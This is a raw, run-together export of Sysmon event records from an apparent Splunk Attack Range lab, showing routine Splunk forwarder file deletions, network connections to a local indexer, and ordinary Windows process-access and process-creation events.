Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBE4311494E91710050E21BDD60B7FD3,SHA256=FD0E77611167AA90F20F9DBFE4FEA2F276CCBFBF5C9ECDBAEC737F968440F170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:39.368{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF131572B8CC080FB71A24C8765CD18,SHA256=5102BADC1C2B79CE81A3E8BF8C010171A5089C086C26C9D98B200EC0F54634A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:40.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE259EBEBA8D9D7D5CC2F4B30A346D56,SHA256=5B7C724E76971CB6A35C92AA24D810EF0555B7F2233D636F9C224E26303E0756,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:40.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFF7BC043A8456DA8C22553847CC109,SHA256=478951A809DBB70A8574F5E7EC43AD2C15D41B18BEAE34A6386338EBD53008F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:39.255{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57347-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:41.873{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A0DD5E2406BC2513FD1EC363E816B9,SHA256=56F85BE1810C47E65A8CC7FE6923ACAC12F01DB7341F92B7E66EAD66B7524526,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.467{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:41.467{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.467{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0A9E1CE5C75474F9F6B62157E7070B1,SHA256=A545EC329C75C9855B599DFA6E46985A6919923FFA27DB08642D0F0C4882B910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:42.904{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD4ED1AF2414DE7709D253AE8F17EA1,SHA256=FDF56DC6DCAED228AD14491A04E428D87225EAEF5CBC06B2119B3F4CF52EC066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:42.420{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B61AA834093479FA88BE45DE776728,SHA256=8CCA8C50A264BDE21D95E07626D952B2EBB953C6B208455636467915775CC186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:43.904{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4372E8E92A8ED6CA7EF4A8FB190AA9,SHA256=15E880ACE7A07FAA1FA178520C921B53A59F466EC041A1B18E55A74DCD2B9531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:43.436{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEA720FE5189BE46EE8EF3B330A0341,SHA256=5325EB53E66A935F28EF7F99797AB6EA54A9F8FFF93FF106D77C19C11D54196F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:44.951{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06F1D16F22F16C68A04D49F75F412411,SHA256=074D70492E158306C1BA320FF1DD00DF3ABE2153ECD3E815FE7BA300431A2CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:44.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7282215D77545A48594F7A055F7F09,SHA256=1C44BCBA7E4786A3AA01E5E6507B9319C2753EBF2C5BAA642EBDF1A6DD958955,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:35.687{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51114-false10.0.1.12-8000- 23542300x8000000000000000808759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:45.967{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EFEA41792EEFF4F93C0DD0C0CA751D2,SHA256=1AB0C8AE29877D9A45D3B92DE9CDEAD5AC081B626161495A4AD392B487A88159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:45.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3A091DAAAD1569FB6CA7676DCD0DDF,SHA256=A76925A44A01E1EED951A0E9DC52CA0871610D73FDB3570CAEB89DC7DF671D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:46.967{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FDBB492EF1840A2274DAE1F76827794,SHA256=15257E81E0F2790A60FAD8ECA05A0302668863CF8698F4A81A623CDE60123F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=764F25650C5DAEC6260884581607189D,SHA256=275749B43D83C8FAC3DA8AA6162CEBF59D9F09E6B1A733ABF715FD264C186764,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:45.209{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57348-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:47.967{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9132039A9DAC5DF9572A83F7B03E91C2,SHA256=616C847BD80AED481A1FE46E82526E522185FE30C828846886148CB5B482EFAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:47.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF23A9D80F2D0795EC2073BD56BA3897,SHA256=9D69342BEED6B2579D6790E547B6D61F49D6BEB4E2F50EDF9D31A9398DED621F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:48.967{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B39AC92B8B781D62DCD809BF441F1D9,SHA256=8F8C22219FC532293E8C9E269AC9A69F1ACF01AE6ED16FA572A44A91EC0A3D61,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:48.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D569391E5252754B8BCB6A3F550B093,SHA256=C9DEA6EA517DE8CD93DB837BFEBCE35B2BCAE68AA9A6FE25B73D83A885F65BFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:49.982{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C934AE8D13F1E678FAAB46D408EFDC,SHA256=3FA3B99DE90659AB170B425784A5185D68456AF9523AD7E85C61C58014F2CC72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:49.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21FA6E95304A22AE956235EC8E9C756,SHA256=9BD68283B456BAF54B74F5CA60C2FDAA6C85612BE953058FDFDCA1B03431C1C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:50.982{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2C21CD22A37709602336D5EE8F03DBE,SHA256=948492AA00549D4BF074C65A84AC9C3ABE41A9B28A7DED80AE1BDAAF1BBFABC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.921{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.906{466BC892-F63A-60EB-937D-00000000CF01}10028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000001051705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.711{466BC892-F63A-60EB-927D-00000000CF01}99164384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.574{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A203269C0CD3CF127AE855F56CBE734B,SHA256=4291E3E3DD81B3C86AFE3422C428FC12964DF8F39C3A2A9C34745AD67621ACCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
